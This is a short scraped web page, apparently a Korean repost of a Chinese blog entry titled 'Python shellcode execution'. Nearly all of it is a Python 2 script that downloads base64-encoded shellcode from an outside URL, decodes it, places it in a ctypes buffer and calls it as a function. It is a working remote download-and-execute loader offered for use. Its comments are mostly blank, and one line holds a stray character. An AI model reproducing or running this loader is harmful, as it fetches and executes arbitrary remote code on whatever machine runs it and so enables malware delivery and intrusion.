파 이 썬 실행 셸 코드

import urllib2
import ctypes
import base64

#     web      shellcode
url = "http://rinige.com/shellcode.bin"
response = urllib2.urlopen(url)
# base64    shellcode
shellcode = base64.b64decode(response.read())
#       
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
#    shellcode      
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE¬
(ctypes.c_void_p))
#    shellcode
shellcode_func()

 
다음으로 전송:https://www.cnblogs.com/hjbf/p/10690788.html

좋은 웹페이지 즐겨찾기